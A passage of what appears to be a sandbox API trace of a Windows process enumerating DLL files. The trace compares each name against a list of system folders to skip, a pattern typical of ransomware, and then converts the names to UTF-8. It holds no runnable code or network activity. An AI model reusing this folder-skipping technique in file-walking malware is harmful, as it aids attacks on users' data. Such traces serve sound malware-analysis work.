(lpString1="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpString2="..") returned 1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpString2="...") returned 1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpString2="windows") returned -1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpString2="recovery") returned -1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpString2="perflogs") returned -1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpString2="documents and settings") returned 1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpString2="$RECYCLE.BIN") returned 1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpString2="system volume information") returned -1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpString2="msocache") returned -1 [0126.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0126.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", cchWideChar=50, lpMultiByteStr=0x20d920, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpUsedDefaultChar=0x0) returned 50 [0126.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0126.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.SPClient.Interfaces.DLL", lpUsedDefaultChar=0x0) returned 50 [0126.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0126.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.691] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpString2=".") returned 1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpString2="..") returned 1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpString2="...") returned 1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpString2="windows") returned -1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpString2="recovery") returned -1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpString2="perflogs") returned -1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpString2="documents and settings") returned 1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpString2="system volume information") returned -1 [0126.691] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpString2="msocache") returned -1 [0126.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0126.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0126.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpUsedDefaultChar=0x0) returned 45 [0126.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0126.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0126.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0126.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.dll", lpUsedDefaultChar=0x0) returned 45 [0126.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0126.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0126.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.692] lstrcmpiW (lpString1="Microsoft.Dallas.OAuthClient.dll", lpString2=".") returned 1 [0126.692] lstrcmpiW (lpString1="Microsoft.Dallas.OAuthClient.dll", lpString2="..") returned 1 [0126.692] lstrcmpiW (lpString1="Microsoft.Dallas.OAuthClient.dll", lpString2="...") returned 1 [0126.692] lstrcmpiW (lpString1="Microsoft.Dallas.OAuthClient.dll", lpString2="windows") returned -1 [0126.692] lstrcmpiW (lpString1="Microsoft.Dallas.OAuthClient.dll", lpString2="recovery") returned -1 [0126.692] lstrcmpiW (lpString1="Microsoft.Dallas.OAuthClient.dll", lpString2="perflogs") returned -1 [0126.692] lstrcmpiW (lpString1="Microsoft.Dallas.OAuthClient.dll", lpString2="documents and settings") returned 1 [0126.692] lstrcmpiW (lpString1="Microsoft.Dallas.OAuthClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.692] lstrcmpiW (lpString1="Microsoft.Dallas.OAuthClient.dll", lpString2="system volume information") returned -1 [0126.692] lstrcmpiW (lpString1="Microsoft.Dallas.OAuthClient.dll", lpString2="msocache") returned -1 [0126.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0126.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Dallas.OAuthClient.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0126.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Dallas.OAuthClient.dll", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Dallas.OAuthClient.dll", lpUsedDefaultChar=0x0) returned 32 [0126.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0126.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0126.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Dallas.OAuthClient.dll", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0126.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Dallas.OAuthClient.dll", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Dallas.OAuthClient.dll", lpUsedDefaultChar=0x0) returned 32 [0126.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0126.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0126.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.Dialog.dll", lpString2=".") returned 1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.Dialog.dll", lpString2="..") returned 1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.Dialog.dll", lpString2="...") returned 1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.Dialog.dll", lpString2="windows") returned -1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.Dialog.dll", lpString2="recovery") returned -1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.Dialog.dll", lpString2="perflogs") returned -1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.Dialog.dll", lpString2="documents and settings") returned 1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.Dialog.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.Dialog.dll", lpString2="system volume information") returned -1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.Dialog.dll", lpString2="msocache") returned -1 [0126.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0126.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.ConnectionUI.Dialog.dll", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0126.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.ConnectionUI.Dialog.dll", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.ConnectionUI.Dialog.dll", lpUsedDefaultChar=0x0) returned 38 [0126.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0126.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0126.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.ConnectionUI.Dialog.dll", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0126.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.ConnectionUI.Dialog.dll", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.ConnectionUI.Dialog.dll", lpUsedDefaultChar=0x0) returned 38 [0126.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0126.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247990 [0126.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0126.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.dll", lpString2=".") returned 1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.dll", lpString2="..") returned 1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.dll", lpString2="...") returned 1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.dll", lpString2="windows") returned -1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.dll", lpString2="recovery") returned -1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.dll", lpString2="perflogs") returned -1 [0126.693] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.dll", lpString2="documents and settings") returned 1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.dll", lpString2="system volume information") returned -1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.ConnectionUI.dll", lpString2="msocache") returned -1 [0126.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.ConnectionUI.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0126.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0126.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.ConnectionUI.dll", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.ConnectionUI.dll", lpUsedDefaultChar=0x0) returned 31 [0126.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.ConnectionUI.dll", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0126.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0126.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.ConnectionUI.dll", cchWideChar=31, lpMultiByteStr=0x240f48, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.ConnectionUI.dll", lpUsedDefaultChar=0x0) returned 31 [0126.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0126.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0126.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0126.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Core.dll", lpString2=".") returned 1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Core.dll", lpString2="..") returned 1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Core.dll", lpString2="...") returned 1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Core.dll", lpString2="windows") returned -1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Core.dll", lpString2="recovery") returned -1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Core.dll", lpString2="perflogs") returned -1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Core.dll", lpString2="documents and settings") returned 1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Core.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Core.dll", lpString2="system volume information") returned -1 [0126.694] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Core.dll", lpString2="msocache") returned -1 [0126.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0126.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Core.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0126.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Core.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.Recommendation.Client.Core.dll", lpUsedDefaultChar=0x0) returned 45 [0126.694] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0126.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0126.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Core.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0126.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Core.dll", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.Recommendation.Client.Core.dll", lpUsedDefaultChar=0x0) returned 45 [0126.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0126.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0126.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0126.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.dll", lpString2=".") returned 1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.dll", lpString2="..") returned 1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.dll", lpString2="...") returned 1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.dll", lpString2="windows") returned -1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.dll", lpString2="recovery") returned -1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.dll", lpString2="perflogs") returned -1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.dll", lpString2="documents and settings") returned 1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.dll", lpString2="system volume information") returned -1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.dll", lpString2="msocache") returned -1 [0126.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0126.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Picasso.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Picasso.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.Recommendation.Client.Picasso.dll", lpUsedDefaultChar=0x0) returned 48 [0126.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0126.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Picasso.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Picasso.dll", cchWideChar=48, lpMultiByteStr=0x20dba8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.Recommendation.Client.Picasso.dll", lpUsedDefaultChar=0x0) returned 48 [0126.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.695] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0126.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0126.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.695] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpString2=".") returned 1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpString2="..") returned 1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpString2="...") returned 1 [0126.695] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpString2="windows") returned -1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpString2="recovery") returned -1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpString2="perflogs") returned -1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpString2="documents and settings") returned 1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpString2="system volume information") returned -1 [0126.696] lstrcmpiW (lpString1="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpString2="msocache") returned -1 [0126.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", lpUsedDefaultChar=0x0) returned 56 [0126.696] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0126.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Data.Recommendation.Client.Picasso.Sampler.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 